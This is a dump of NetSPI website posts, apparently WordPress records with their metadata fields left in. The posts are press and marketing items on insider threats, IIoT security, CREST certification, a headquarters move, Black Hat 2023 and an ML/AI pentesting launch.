NetSPI Field CISO Nabil Hannan shares advice on key vulnerabilities to be aware of during National Insider Threat Awareness Month. Read a preview below or view it online here.
+++
National Insider Threat Awareness Month (NITAM) is an annual, month-long campaign that takes place in September to educate government and industry about the risks posed by insider threats and the role of insider threat programs. This year's theme is "Bystander Engagement," which emphasizes the importance of all employees being aware of and reporting suspicious activity.
Insider threats are one of the most significant security risks facing organizations today. They can come from a variety of sources, including disgruntled employees, malicious insiders, and careless insiders. Insider threats can cause significant damage to an organization, including data breaches, financial losses, and reputational harm.
NITAM is a critical opportunity for organizations to raise awareness of insider threats and to implement effective insider threat programs. By educating employees about the risks and by encouraging them to report suspicious activity, organizations can help to protect themselves from insider threats.
Expert Commentary
In this round up article, we will be sharing commentary from a number of industry experts on the importance of insider threat awareness. We hope that this article will help to raise awareness of insider threats and that it will encourage organizations to take the necessary steps needed to protect themselves.
"This National Insider Threat Awareness Month, it’s important to raise awareness around some of the most commonly exploited vulnerabilities within an organization’s internal network. According to NetSPI’s 2023 Offensive Security Vision Report – which is based on more than 300,000 pentesting engagements – we found that excessive internal permissions continue to plague organizations. We witnessed network shares or SQL servers that unintentionally allowed access to all domain users, which often contain sensitive information, credentials to other services, or customer data (suchas credit card numbers or PII). Unexpected excessive privileges leads to a large number of internal users having access to unintended sensitive data. All it takes is one rogue employee to cause major damage.
Additionally, weak or default passwords continue to be used within organizations, especially when accessing internal networks that contain highly sensitive information. Unlike interfaces exposed externally, interfaces on the internal network typically don’t require multi-factor authentication, making the likelihood of compromise much greater. Basic security hygiene, as well as an understanding of internal sharing protocols, can provide a solid foundation in bolstering protection against insider threats."
NetSPI CISO Norman Kromberg was featured in CSO's latest article on emerging threats in 2023. Read a preview below or view it online here.
+++
In cybersecurity’s never-ending cat-and-mouse game with hackers and grifters, the threats are always evolving. Here are some of the main attacks experts see as the biggest and baddest on the horizon.
Companies using Microsoft Teams got news earlier in the summer of 2023 that a Russian hacker group was using the platform to launch phishing attacks, putting a new spin on a long-known attack strategy. According to Microsoft Threat Intelligence, the hackers, identified as Midnight Blizzard, used Microsoft 365 tenants owned by small businesses compromised in previous attacks to host and launch new social engineering attacks.
Threats evolve constantly as hackers and grifters gain access to new technologies or come up with new ways to exploit old vulnerabilities. "It's a cat and mouse game," says Mark Ruchie, CISO of security firm Entrust.
The volume and velocity of attacks have increased, as have the costs incurred by victims, with the 2022 Official Cybercrimes Report from Cybersecurity Ventures estimating that the cost of cybercrime will jump from $3 trillion in 2015 to a projected $10.5 trillion in 2025.
At the same time, security leaders say they see new takes on standard attack methods -- such as the attacks launched by Midnight Blizzard (which has also been identified by the names APT29, Cozy Bear and NOBELIUM) -- as well as novel attack strategies. Data poisoning, SEO poisoning and AI-enabled threat actors are among the emerging threats facing CISOs today.
"The moment you agree to be a CISO, you agree to get into a race you never win completely, and there are constantly evolving things that you have to have on your screen," says Andreas Wuchner, field CISO for security company Panaseer and a member of the company's advisory board.
...
Preparing for what's next
A majority of CISOs are anticipating a changing threat landscape: 58% of security leaders expect a different set of cyber risks in the upcoming five years, according to a poll taken by search firm Heidrick & Struggles for its 2023 Global Chief Information Security Officer (CISO) Survey.
CISOs list AI and machine learning as the top themes in most significant cyber risks, with 46% saying as much. CISOs also list geopolitical, attacks, threats, cloud, quantum, and supply chain as other top cyber risk themes.
Authors of the Heidrick & Struggles survey noted that respondents offered some thoughts on the topic. For example, one wrote that there will be "a continued arms race for automation." Another wrote, "As attackers increase [the] attack cycle, respondents must move faster." A third shared that "Cyber threats [will be] at machine speed, whereas defenses will be at human speed."
The authors added, "Others expressed similar concerns, that skills will not scale from old to new. Still others had more existential fears, citing the 'dramatic erosion in our ability to discern truth from fiction.'"
Security leaders say the best way to prepare for evolving threats and any new ones that might emerge is to follow established best practices while also layering in new technologies and strategies to strengthen defenses and create proactive elements into enterprise security.
"It's taking the fundamentals and applying new techniques where you can to advance [your security posture] and create a defense in depth so you can get to that next level, so you can get to a point where you could detect anything novel," says Norman Kromberg, CISO of security software company NetSPI. "That approach could give you enough capability to identify that unknown thing."
[post_title] => CSO: Emerging cyber threats in 2023 from AI to quantum to data poisoning
[post_excerpt] => NetSPI CISO Norman Kromberg was featured in CSO's latest article on emerging threats in 2023.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => cso-emerging-cyber-threats-in-2023
[to_ping] =>
[pinged] =>
[post_modified] => 2023-09-14 15:27:15
[post_modified_gmt] => 2023-09-14 20:27:15
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=31051
[menu_order] => 4
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[2] => WP_Post Object
(
[ID] => 31047
[post_author] => 91
[post_date] => 2023-09-01 09:00:00
[post_date_gmt] => 2023-09-01 14:00:00
[post_content] =>
Larry Trowell, NetSPI's Director of IoT and Embedded Pentesting, was featured in Network Computing's latest article on securing Industrial IoT (IIoT) networks. Read a preview below or view it online here.
+++
Misconfiguration, ransomware, and alert fatigue could lead to downtime on industrial IoT networks in industries such as manufacturing and energy.
As IT, cloud, and industrial networks come together in industrial environments like shipping ports, oil refineries, and factories, organizations are facing new security threats.
In fact, Cisco says 35% of its customers mention security as a top obstacle to IoT. In addition, in the report “The State of Industrial Security in 2022" from Barracuda Networks, 93% of businesses reported that an IIoT/OT security project had failed.
In an Industrial IoT (IIoT) environment, networks, switches, routers, and wireless equipment connect to sensors on physical machinery. Because IIoT networks incorporate automation, they could bring new efficiencies by collecting data at the edge and enabling visibility into issues ahead of time. This process is called the Fourth Industrial Revolution, or Industry 4.0.
“Industrial IoT is basically bringing the [operational technology (OT)] and the IT together to get deeper insights in process telemetry and to use that to really improve the efficiency or deliver new services,” explains Anand Oswal, senior vice president and general manager of network security at Palo Alto Networks, in an interview.
These devices are typically built on a flat Layer 2 segmented architecture, according to Oswal. Flat networks link devices to a single switch rather than separate switches, and Layer 2 is the data layer in the International Organization for Standardization (ISO) reference model for system interconnection.
As “things” get connected, network operators must pay more attention to the attack surface, Oswal notes.
“Threats move laterally, and exposure of formally isolated OT systems may cause potential cyber threats from the IT domain and back and forth,” Oswal says. “Many of these IoT systems are part of larger operations. If these systems are disrupted, there could be loss of important data telemetry that lead to production decisions, poor analytics, or stoppage of operations,” Oswal notes. It could also lead to loss of life.
The Pace of Patching in Industrial IoT
Industries like manufacturing and oil and gas use older legacy systems that are lacking in security systems and were not designed for patching, explains Larry Trowell, director at penetration-testing company NetSPI.
“While these systems get the job done well when maintained, they were not necessarily built with modern security in mind,” he says.
[post_title] => Network Computing: What You Need to Know About Securing Industrial IoT Networks
[post_excerpt] => Larry Trowell, NetSPI's Director of IoT and Embedded Pentesting, was featured in Network Computing's article on securing Industrial IoT (IIoT) networks.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => network-computing-securing-industrial-iot-networks
[to_ping] =>
[pinged] =>
[post_modified] => 2023-09-14 15:25:48
[post_modified_gmt] => 2023-09-14 20:25:48
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=31047
[menu_order] => 6
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[3] => WP_Post Object
(
[ID] => 30898
[post_author] => 91
[post_date] => 2023-08-29 09:18:41
[post_date_gmt] => 2023-08-29 14:18:41
[post_content] =>
Learn about the journey to CREST certification directly from our offensive security consultants. CREST certification is an accreditation that establishes professional standards for penetration testing.
This Q&A between NetSPI EMEA Services Director Sam Kirkman and Senior Security Consultant Tyler Sullivan takes you through the process to achieve the CREST Certified Tester (CCT) qualification and how it enables NetSPI to better serve clients across the globe.
Watch the video below or read along with the Q&A.
https://www.youtube.com/watch?v=4tnLOf2nne8
Tyler, why don't you start off with a bit of an intro about yourself?
“I first got into cybersecurity while I was at university doing computer science and found it to be really interesting and had a real passion for it. So, I did my dissertation on cybersecurity. And after university, I was lucky enough to land a graduate job as a consultant. And this was sort of where my journey really began. I did a lot of web application testing and a lot of infrastructure testing, but particularly enjoyed web testing [...] And so that led me down the route of getting some qualifications in web security. And I went for and have achieved the CREST certification.”
Why is it important to achieve CREST certification?
In the UK in particular, CREST is a respected and well-known organisation. They accredit a lot of companies and certify a lot of individuals, so it’s a logical path for penetration testers to go down. Traditionally, individuals start out with the CREST Practitioner Security Examination Analyst (CPSA) examination.
For a security consultant just starting out, it's useful to have that first goal of passing the CPSA examination. When consultants start learning more about cybersecurity, then they can do the CREST registered tester (CRT) exam.
“What really drove me towards those exams initially was that it made sense logically and had a progression. But also, they’re well respected and challenging exams. If it’s difficult to get [these certifications], they're going to come with a lot of respect and really showcase your web skills.”
What is the journey like to pass the CPSA exam? Is it challenging right from the start?
When you’re working toward CPSA, it can seem a bit daunting as your first qualification in the industry. At first, there are a lot of simple fundamentals to learn but at the same time, it can be challenging as a new professional in the industry. The timeline between the exams is well laid out, which makes it manageable.
The CPSA is helpful because it teaches the necessary fundamentals, and the CRT is more of a little bit of everything and covers a lot more about web infrastructure. At the time, when preparing for these exams, you should be at least a mid-level tester.
When you get to the specific specialties, either application testing (CCT App) or infrastructure testing (CCT Inf), that's when you put your head down and focus. The final section is broken into two additional parts. So, you have this multiple choice, which is kind of like CPSA, but much harder, and a lot more information. And then you come to the practical exam, where you have an assault course and a scenario, which lasts about a day.
“I found the exam really tough, but really rewarding [...] By the end of it, your brain is fried, because it's just a really tough exam. But yeah, I passed in February last year and it's probably my best achievement in the industry so far.”
Does being CREST-certified change the way you can have conversations with customers and the way that they look at you as well?
CREST is well known in the UK especially because a lot of companies and clients do look for CREST certification and accreditation. One thing that is useful is that when you’re speaking with a client, you can be introduced as a CREST-certified tester. When clients look it up, they’ll see that it’s one of the best, most comprehensive web exams in the UK and one of the best in the world if you’re looking globally.
Overall, being CREST-certified makes it easier because clients can see that you’re knowledgeable. If you have this qualification, it shows that not only do you have theory knowledge, but also practical real-world cybersecurity experience and pentesting experience.
Do the skills developed during CREST exams help in the real world and in your day-to-day job as a penetration tester?
Knowledge from the exam is useful in day-to-day job scenarios. The exam teaches you how to deal with problems and unexpected inputs and scenarios, which is basically what penetration testing is. It's seeing something you haven't seen before and knowing how to apply certain theories that you've learned in different ways. And it's not always the same formula, it's very different each time.
The exam also has an element of reporting in there, which is obviously very important. At the end of the day, the report is what the client sees. And if you can't communicate the results properly, then the client is not able to fix what is shown in the results.
The CREST certification provides a great base and advanced knowledge and enables you to venture out into very niche parts of cybersecurity. However, it’s important to always continue learning.
“A lot of my learning happens outside of the qualifications as well. Being on the team here at NetSPI, there are a lot of talented people, not just talented in web security, but we have really good cloud people. It's hardware hackers, I don't think I've ever been in an environment where there are just so many specialists. And it's really good, because everything that you learn from even people that are doing hardware, hacking something so different. Being on the NetSPI team is a constant learning experience, I think in cybersecurity and penetration testing it's impossible to ever stop learning.”
Qualifications provide structure and a sense of achievement. And in the cybersecurity industry, continual learning is always important as the threat landscape continues to evolve. You mentioned that you never stop learning, have you decided what comes next for you?
“I think at the moment, I'm really enjoying just being able to have the freedom to go investigate something, or potentially go develop something. So, I think as a cyber professional, you do have to be able to do a little bit of everything. So, I've done a lot of development work recently and I've been enjoying writing some plugins and things that helped me become a better tester and more efficient tester. For the time being, I’ll keep doing this for another two years, then I'll have to renew my credit certification.”
Yes, NetSPI employs multiple CREST-registered and -certified penetration testers. CREST Registered Tester (CRT) is a mid-level qualification. CREST Certified Tester (CCT) is the higher level qualification, earned for either application testing (CCT App) or infrastructure testing (CCT Inf).
Partner with NetSPI’s team of expert pentesters
NetSPI’s team of expert pentesters is available to provide always-on security, whether you need to scope a new engagement, parse real-time vulnerability reports, prioritise remediation, or ensure compliance. Learn more about NetSPI’s penetration testing as a service (PTaaS) or schedule a demo to speak with our team directly.
[post_title] => Q&A with Tyler Sullivan: The Journey to CREST Certification
[post_excerpt] => Learn about the journey to CREST certification directly from our offensive security consultants and how the certification helps in day-to-day pentesting work.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => the-journey-to-crest-certification
[to_ping] =>
[pinged] =>
[post_modified] => 2023-08-29 09:18:41
[post_modified_gmt] => 2023-08-29 14:18:41
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=30898
[menu_order] => 7
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[4] => WP_Post Object
(
[ID] => 30951
[post_author] => 91
[post_date] => 2023-08-29 09:00:00
[post_date_gmt] => 2023-08-29 14:00:00
[post_content] =>
Minneapolis-based NetSPI is planning to move to a new North Loop headquarters, taking over half of the sublease space put on the market by Calabrio Inc. late last year.
The cybersecurity company will move into 60,000 square feet of space on the
11th and 12th floors of the Steelman Exchange building, at 241 Fifth Ave. N. Those floors – plus floors nine and 10 – are leased by Calabrio, a developer of call-center software, but were put up for sublease at the end of last year.
[post_title] => Minneapolis/St. Paul Business Journal: NetSPI moving to new North Loop HQ, takes over part of Calabrio sublease
[post_excerpt] => NetSPI's new Minneapolis headquarters was announced in the Minneapolis-St. Paul Business Journal.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => msp-business-journal-hq
[to_ping] =>
[pinged] =>
[post_modified] => 2023-09-05 11:54:10
[post_modified_gmt] => 2023-09-05 16:54:10
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=30951
[menu_order] => 8
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[5] => WP_Post Object
(
[ID] => 30884
[post_author] => 91
[post_date] => 2023-08-29 07:00:00
[post_date_gmt] => 2023-08-29 12:00:00
[post_content] =>
The new, collaborative office space signals accelerated innovation and growth for the offensive security company.
Minneapolis, MN – August 29, 2023 – NetSPI, the global leader in offensive security, today announced its new headquarters location in the Steelman Exchange building in Minneapolis, Minnesota. The decision to move was prompted by the increasing employee headcount and the need for a more collaborative workplace as the company continues to experience rapid adoption. In 2023 to date, NetSPI has hired 150+employees, completed 2,733 offensive security assessments, and welcomed 238 new customers.
“The Steelman Exchange is the perfect fit for our team as we enter a momentous and pivotal year for NetSPI,” shared Aaron Shilts, CEO at NetSPI. “This investment in our workplace will nurture our continued growth, promote collaboration and innovation in offensive security, and ensure we maintain the unique culture that makes NetSPI so special.”
There are several initiatives driving the offensive security company’s growth in 2023, including:
Emphasis on defining NetSPI’s offensive security product roadmap and vision, driven by continuous adoption of the company’s Penetration Testing as a Service (PTaaS), Attack Surface Management (ASM), and Breach and Attack Simulation (BAS) platforms.
Numerous innovations from the NetSPI Labs research and development team, including the launch of the Software as a Service (SaaS) Security Assessment and AI/ML Penetration Testing solutions. Along with ongoing industry research and responsible disclosures, including two Azure vulnerability disclosures from the NetSPI cloud penetration testing team.
Expansion of the EMEA pentesting team and formalization of CREST and CHECK accreditations to perform mandated pentests in the region.
Strategic leadership and Board of Directors appointments, including Vinay Anand as Chief Product Officer, Jay Golonka as Chief Financial Officer, Nick Walker as Director of EMEA, and Scott Lundgren and John Spiliotis as members of the Board of Directors.
Exponential NetSPI Partner Program growth, with the introduction of 29 new partnerships in 2023 to date, including BMC Software, Optum, and Chubb.
The release of NetSPI’s inaugural Offensive Security Vision Report, with valuable insights on the top vulnerabilities by attack surface, the state of remediation, and cybersecurity hiring trends.
The acquisition of nVisium which continues to support scalability and delivery of its offensive security solutions.
NetSPI has been honored as a Top Workplaces USA winner for the past two years and as one of the best places to work in the state of Minnesota for three consecutive years. This year, the company ranked #12 on the midsize companies list, with special recognition for its innovation, employee appreciation, work-life flexibility, compensation and benefits, leadership, and purpose and values.
“We will continue to prioritize flexible and remote work options as a company,” explained Heather Crosley, VP of People Operations. “At the same time, we recognize that an intentional space to connect in-person can make an incredible impact on our ability to collaborate, innovate, and deliver the best offensive security solutions globally. And that’s exactly what this new space is designed to do.”
The move will take place in January 2024 and NetSPI will remain at its current headquarters at 800 N Washington Ave #670 in Minneapolis until then.
Michael Anderstrom at Colliers represented NetSPI in the transaction.
Visit www.netspi.com/careers to explore open roles in Minneapolis and its other US, India, Canada, and UK locations.
https://youtu.be/mkzEKUN4RSU
About NetSPI
NetSPI is the global leader in offensive security, delivering the most comprehensive suite of penetration testing, attack surface management, and breach and attack simulation solutions. Through a combination of technology innovation and human ingenuity NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. Its global cybersecurity experts are committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, four of the top five leading cloud providers, four of the five largest healthcare companies, three FAANG companies, seven of the top 10 U.S. retailers & e-commerce companies, and many of the Fortune 500. NetSPI is headquartered in Minneapolis, MN, with offices across the U.S., Canada, the UK, and India.
[post_title] => NetSPI Moves to New Minneapolis Headquarters to Accommodate Growth
[post_excerpt] => Read about NetSPI’s move to a new Minneapolis headquarters to accommodate continued growth and innovation in the offensive security industry.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => new-netspi-headquarters
[to_ping] =>
[pinged] =>
[post_modified] => 2023-08-29 08:59:34
[post_modified_gmt] => 2023-08-29 13:59:34
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=30884
[menu_order] => 9
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[6] => WP_Post Object
(
[ID] => 30876
[post_author] => 91
[post_date] => 2023-08-24 12:15:39
[post_date_gmt] => 2023-08-24 17:15:39
[post_content] =>
As August comes to a close, we’re reliving the highlights from Black Hat 2023! Our team had a great time at this year’s event, complete with attending (and leading) workshops, launching new products, and of course, memorable evenings in the heart of Las Vegas.
https://www.youtube.com/watch?v=rJBCnT6QrwU
To all the NetSPI team members who attended Black Hat (and DEF CON 31!), and the key players who held down our home base, thank you for making this year’s conference a success! Tapping into this year’s theme, we really are better together. We asked a few of our offensive security experts to weigh in on the key themes, favorite conversations, and more details on what stole the show this year.
3 Key Themes from Black Hat 2023
NetSPI Field CISO Nabil Hannan shared four themes from Black Hat:
AI/ML was pervasive across vendors
More focus on AppSec, especially integrating it into CI/CD pipelines
Lots of interest in automotive, aerospace, and IoT security
Let’s explore these.
AI Stole the Show
A key theme at Black Hat was AI leading innovation in technology. Many vendors had AI-powered platforms on display — NetSPI included. Looking at the security industry as a whole, we’re still in the infancy of our collective AI journey. AI is powerful, but navigating this space alone is challenging.
NetSPI launched AI/ML Penetration Testing to help trailblazing companies stay creative with AI while remaining confident in the security of their new technologies. We’ve only begun to see the changes AI and ML can bring to security, and we can’t wait to build the next evolution together.
All about AppSec
Incorporating security into the application lifecycle is easier said than done. Fortunately the industry is increasingly invested in security best practices throughout the development and testing phases to help address common risks. Peek the OWASP API Security Top 10 for the most prevalent vulnerabilities. Nabil noted that application security is being added specifically into continuous integration and continuous delivery (CI/CD) pipelines, meaning development teams have moved beyond AppSec in theory and into implementing it as a process.
Automotive. Aerospace. IoT. Oh My!
Digital transformation and Internet of Things (IoT) go hand-in-hand. And if those weren’t enough buzzwords for you, here’s one more: The digital footprint companies have today is vastly larger and more dynamic than ever before. Internet-facing technology holds a higher potential for exposure to threats because it has multiple access points with greater public accessibility. One of NetSPI’s specialties is IoT Penetration Testing across industries to help internet-facing assets remain secure.
NetSPI Director of IoT and Embedded Pentesting Larry Trowell noted aerospace as a trending industry at Black Hat because of its broad coverage area. As connected devices continue to become a must-have instead of a nice-to-have, security will progress as a necessity.
Bonus Theme: Azure Cloud Security
Okay, we’re cheating a little here as this was more a DEF CON theme versus Black Hat, but “hacker summer camp” nevertheless. Our resident Azure security expert and tenured DEF CON volunteer Karl Fosaaen made his way to Vegas for DEF CON 31. This year was extra special as Karl brought his dad along to experience the event for the first time!
In the wake of Tenable CEO Amit Yoran calling out Microsoft for its handling of vulnerability disclosures, Azure security was certainly a topic of conversation across the community. NetSPI had two opportunities to provide insights on how to navigate Azure cloud security concerns.
Karl was invited to speak with Ashish Rajan, host of the Cloud Security Podcast, on Azure insecurities, why pentesting must go beyond configuration reviews, the difference between testing AWS versus Azure, practical steps to strengthen Azure security, common attack TTPs, and more. The episode will air on Monday, August 28 – keep an eye out!
Later at the DEF CON Cloud Village, Karl and NetSPI’s cloud pentesting lead Thomas Elling led a talk titled, What the Function: A Deep Dive into Azure Function App Security. The talk centered around the security risks associated with the increasing use of Platform as a Service (PaaS) resources in the cloud, specifically the use of the Azure Function App service. If you missed the talk, no worries! They followed the session up with a detailed write-up on the NetSPI technical blog.
What’s it Take to Be a Global Leader?
Several companies at Black Hat self-proclaimed the title “leader” on their booths, enticing a curious mind to pose a question: what merits the claim of a leader? While we can’t speak for other companies, we can give insight into why NetSPI claims the title of global leader in offensive security.
In addition to third-party recognition, we hold the title of leader because we are trailblazing a path forward in offensive security so that teams have a partner in navigating this complex space. Our suite of offensive security solutions consolidates services with one vendor, giving us a deep understanding of client systems for more tailored recommendations.
NetSPI Chief of Product Vinay Anand spoke to this in his Black Hat presentation, Defining a Roadmap for Offensive Security. The presentation covered the past, present, and future of proactive security measures, why offensive security is today’s North Star for risk and exposure management, and how to make progress toward an offensive security strategy. Grab Vinay’s slides here.
Lastly, we invite you to meet our pentesting team, check out our recent research, and view our open-source tools. We guarantee you'll learn something that could only be taught by leaders in their field.
Between the learning opportunities, building connections new and old, and having great food and conversation with our trusted customers and peers, Black Hat lived up to its hype. Until next year!
[post_title] => Back in Black (Hat): Here's What Stole the Show
[post_excerpt] => Join us in reliving our Black Hat experience with three themes of the conference and what it takes to be a global leader in offensive security.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => back-in-black-hat-what-stole-the-show
[to_ping] =>
[pinged] =>
[post_modified] => 2023-08-25 11:00:15
[post_modified_gmt] => 2023-08-25 16:00:15
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=30876
[menu_order] => 10
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[7] => WP_Post Object
(
[ID] => 30811
[post_author] => 91
[post_date] => 2023-08-10 09:00:00
[post_date_gmt] => 2023-08-10 14:00:00
[post_content] =>
Minneapolis, MN – August 10, 2023 – NetSPI, the global leader in offensive security, has announced a strategic collaboration with BMC, a global leader in software solutions for the Autonomous Digital Enterprise, to strengthen mainframe security for their customers. The collaboration aligns with BMC's commitment to partnering with best-of-breed security brands, enabling both companies to deliver enhanced cybersecurity solutions to organizations worldwide, with an emphasis on mainframe security.
BMC customers will now have access to NetSPI's comprehensive mainframe penetration testing solutions and state-of-the-art delivery platforms to evaluate network security from an adversarial perspective. In return, NetSPI solutions will use BMC Automated Mainframe Intelligence (BMC AMI) software assets, enabling automated vulnerability scanning to identify and address potential exploits. NetSPI will also contribute to the future development of the BMC AMI security portfolio, driving innovation in mainframe vulnerability management solutions.
John McKenny, Senior Vice President and General Manager of Intelligent Z Optimization and Transformation at BMC, highlighted the benefits of the effort, stating, "Our customers will benefit from independent pentesting services delivered by NetSPI, a world-leading brand in the cybersecurity field. Their expertise and insights on mainframe security will play a pivotal role in shaping the future of our BMC AMI Security portfolio."
“Mainframes still hold critical information and perform critical functions for a lot of large enterprises today. Regular security testing must be prioritized,” stated Philip Young, Director of Mainframe Pen-testing at NetSPI. “Enterprises can’t afford downtime on their mainframes. This collaboration ensures our mutual customers the best protection so they can continue innovating – with confidence.”
Lauren Gimmillaro, VP Business Development and Strategic Alliances at NetSPI, expressed her excitement about the new offerings, saying, "We are thrilled to join forces with BMC Software. This collaboration not only expands the reach of our offensive security solutions but also provides us with an opportunity to contribute to the BMC AMI Security portfolio, driving innovation and delivering comprehensive vulnerability management solutions to organizations worldwide."
For more information on BMC and NetSPI, please visit the following websites:
NetSPI is the global leader in offensive security, delivering the most comprehensive suite of penetration testing, attack surface management, and breach and attack simulation solutions. Through a combination of technology innovation and human ingenuity NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. Its global cybersecurity experts are committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, four of the top five leading cloud providers, four of the five largest healthcare companies, three FAANG companies, seven of the top 10 U.S. retailers & e-commerce companies, and many of the Fortune 500. NetSPI is headquartered in Minneapolis, MN, with offices across the U.S., Canada, the UK, and India.
BMC, BMC Software, the BMC logo, and other BMC marks are the exclusive properties of BMC Software, Inc. and are registered or may be registered with the U.S. Patent and Trademark Office or in other countries.
On August 9, 2023, CRN summarized 10 products launched at this year's Black Hat conference, including NetSPI's AI/ML Penetration Testing. Scroll to slide 10 in the online article here for the full story.
+++
NetSPI ML/AI Pentesting
NetSPI, whose offerings include penetration testing services and attack surface management, said at Black Hat 2023 that it’s expanding to provide security for machine learning technologies—such as the Large Language Models used in generative AI apps. Calling the ML/AI Pentesting a “first-of-its-kind” offering, NetSPI said that key capabilities include identification, analysis and remediation for ML models such as LLMs. The company is also now providing “real-world” guidance on issues related to the securing of ML models, NetSPI said in a news release.
[post_title] => CRN: 10 Cool New Security Products Unveiled At Black Hat 2023
[post_excerpt] => n August 9, 2023, CRN summarized 10 products launched at this year's Black Hat conference, including NetSPI's AI/ML Penetration Testing.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => crn-10-cool-new-security-products
[to_ping] =>
[pinged] =>
[post_modified] => 2023-09-13 11:46:01
[post_modified_gmt] => 2023-09-13 16:46:01
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=31024
[menu_order] => 16
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[9] => WP_Post Object
(
[ID] => 31010
[post_author] => 91
[post_date] => 2023-08-08 09:00:00
[post_date_gmt] => 2023-08-08 14:00:00
[post_content] =>
SiliconANGLE shared NetSPI's announcement of AI/ML Penetration Testing on August 8, 2023 covering how the new solution brings a more holistic and proactive approach to safeguarding machine learning model implementations. Read the full story here.
+++
Cybersecurity services and software provider NetSPI LLC today announced a new machine learning and artificial intelligence penetration testing solution to bring a more holistic and proactive approach to safeguarding machine learning model implementations.
Claimed to be the first of its kind, NetSPI’s ML/AI Pentesting solution focuses on two core components: identifying, analyzing and remediating vulnerabilities on machine learning systems such as large language models, and providing grounded advice and real-world guidance to ensure security is considered from ideation to implementation.
NetSPI argues that with the current pace of machine learning and AI adoption, it’s vital for organizations to understand the distinct threats inherent in this technology, such as pinpointing weak spots and architecting more secure models. The new service is rooted in NetSPI’s adversarial machine learning testing methodology — the study of adversarial attacks on machine learning and corresponding defenses.
Channel Futures rounds up the biggest headlines from Black Hat 2023, including NetSPI's debut of AI/ML Penetration Testing. Learn more and hear from NetSPI’s vice president of business development and strategic alliances, Lauren Gimmillaro on slide 10 of the article here.
+++
Also at Black Hat, NetSPI debuted its machine learning/artificial intelligence (ML/AI) penetration testing solution aimed at bringing a more holistic and proactive approach to safeguarding ML model implementations.
The solution focuses on two core components. Those are identifying, analyzing and remediating vulnerabilities on ML systems such as large language models (LLMs), and providing grounded advice and real-world guidance to ensure security is considered from inception to implementation.
As adoption of ML and AI accelerates, organizations must understand the unique threats that accompany this technology to better identify areas of weakness and build more secure models, according to NetSPI.
Lauren Gimmillaro, NetSPI’s vice president of business development and strategic alliances, said NetSPI’s partners can help their customers navigate their ML/AI security challenges with confidence, backed by NetSPI’s expertise in ML and data science to help them secure their innovation.
“This new testing capability will open opportunities across their customers’ tech stack, including cloud, web and applications as our reports and recommendations for remediation are brought to them in real time,” she said. “Some specific examples of new opportunities include data set security, adversarial testing and API security.”
AI innovation and the fast adoption of ML systems into production is happening whether companies are ready or not, Gimmillaro said.
“It’s critical that we help our partners cater to a diverse range of industries and deployments in this space, from chatbots to data analytics, to text generation and everything in between,” she said. “Our testing methodology is rooted in adversarial ML and backed by a team of over 200 pen-testing experts that are equipped to test against real adversarial attack techniques. This is the advantage we help our partners deliver to their customers.”
[post_title] => Channel Futures: AI and Cybersecurity Take Center Stage at Largest-Ever Black Hat USA
[post_excerpt] => Channel Futures rounds up the biggest headlines from Black Hat 2023, including NetSPI's debut of AI/ML Penetration Testing.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => channel-futures-ai-and-black-hat-usa
[to_ping] =>
[pinged] =>
[post_modified] => 2023-09-13 11:45:56
[post_modified_gmt] => 2023-09-13 16:45:56
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=31013
[menu_order] => 14
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[11] => WP_Post Object
(
[ID] => 31027
[post_author] => 91
[post_date] => 2023-08-08 09:00:00
[post_date_gmt] => 2023-08-08 14:00:00
[post_content] =>
On August 8, 2023, insideBIGDATA shared NetSPI's announcement of AI/ML Penetration Testing with a focus on identifying, analyzing, and remediating vulnerabilities on machine learning systems such as Large Language Models (LLMs) and providing grounded advice and real-world guidance to ensure security is considered from ideation to implementation.
NetSPI, the global leader in offensive security, today debuted its ML/AI Pentesting solution to bring a more holistic and proactive approach to safeguarding machine learning model implementations. The first-of-its-kind solution focuses on two core components: Identifying, analyzing, and remediating vulnerabilities on machine learning systems such as Large Language Models (LLMs) and providing grounded advice and real-world guidance to ensure security is considered from ideation to implementation.
As adoption of ML and AI accelerates, organizations must understand the unique threats that accompany this technology to better identify areas of weakness and build more secure models. NetSPI’s testing methodology is rooted in adversarial machine learning – the study of adversarial attacks on ML and corresponding defenses. With this foundational research, the company’s offensive security experts have the knowledge to better understand and mitigate vulnerabilities within ML models by putting them to the test against real adversarial attack techniques.
Click here to read the full story on insideBIGDATA.
[post_title] => InsideBIGDATA: NetSPI Debuts ML/AI Penetration Testing, a Holistic Approach to Securing Machine Learning Models and LLM Implementations
[post_excerpt] => n August 8, 2023, insideBIGDATA shared NetSPI's announcement of AI/ML Penetration Testing with a focus on identifying, analyzing, and remediating vulnerabilities on machine learning systems.
[post_status] => publish
